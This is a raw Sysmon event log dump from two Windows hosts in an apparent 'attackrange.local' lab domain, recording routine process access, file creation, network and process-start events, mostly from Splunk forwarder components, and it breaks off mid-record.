09:24:30.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.780{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8DCE-6151-B900-00000000FD01}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.780{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.780{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8DCE-6151-B900-00000000FD01}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.781{5EBD8912-8DCE-6151-B900-00000000FD01}5656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.702{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB3C41B8060D24EF088D0D29DF006BC6,SHA256=BCFB59A4B0A9F3A694CC0C198E7A934C190D13F2B25B416A46DE3CB2B4C837EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981452Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:30.207{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ECFDF9E9E6F45F262E62046BE61694B,SHA256=8DEA651641BB54072BB72540EBFD478D4C2D88D80E21C10FB41E2C6256935051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.437{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=39B1569E4DC2E17A0E3A54166805CBD1,SHA256=0E26A73F19515D109F78272290ADCF4EE0A96994EA85132A06C4E8966E90A3F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.781{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D42A75EF3EB7DA5397A0DEF96FE5738,SHA256=3B8BB33D56F9D8B78A081D03B0691529F415F7967A280EBAE0F62C2242841985,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.702{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48284067FA34B903D20620CD037E9C54,SHA256=837D7F693807B1B02CEE9CA91E89ECA3A1AE706ED7692C0D622D91033E3ACEC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981453Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:31.379{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76CB133079193560E4C70721D89DC861,SHA256=2B210E04709D17742C4146ED2A726AF5F23F55ACD74E5AAED1E172BE8BACCAC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.656{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8DCF-6151-BA00-00000000FD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.656{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.656{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.656{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.656{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.656{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8DCF-6151-BA00-00000000FD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.656{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8DCF-6151-BA00-00000000FD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:31.656{5EBD8912-8DCF-6151-BA00-00000000FD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001056904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.616{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54248-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001056903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:29.616{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54248-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001056902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:28.402{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50358-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:32.702{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=647914329897677934A6022AD3064D93,SHA256=A74C6E72C09FC04B6061A9FCBC162C4E6A27708842641CA8B230E8091E8007C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981456Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:28.829{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59549-false10.0.1.12-8000- 23542300x8000000000000000981455Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:32.645{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B92431003BD7DA83A98086AAFF3746E9,SHA256=42DF1607607DC4B71D6E26B8506C150FB6934AB77CDEBC34DE6A7C46063FE411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981454Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:32.395{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D968FC42E6C568C0B16F0466519F2F6A,SHA256=856B7908E08EB3689D4E86FA0EBF658E790249913E91C8E0005F824AEC9EA1FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.703{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B42AF0CC0D8CB17C126303836939BD8,SHA256=B236D1DAEEC428ADAB2205496111E8204C46C2E9EE639B921BC1C13B0961AAE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981457Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:33.395{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=461700D193845399C72677D429CFABA6,SHA256=170883D43877C5DED116C0022F4B6BBD2D64E77DA23E036DD300E69BE58ACF0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.421{5EBD8912-8DD1-6151-BB00-00000000FD01}55245484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.202{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8DD1-6151-BB00-00000000FD01}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.202{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.202{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.202{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.202{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.202{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8DD1-6151-BB00-00000000FD01}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.202{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8DD1-6151-BB00-00000000FD01}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 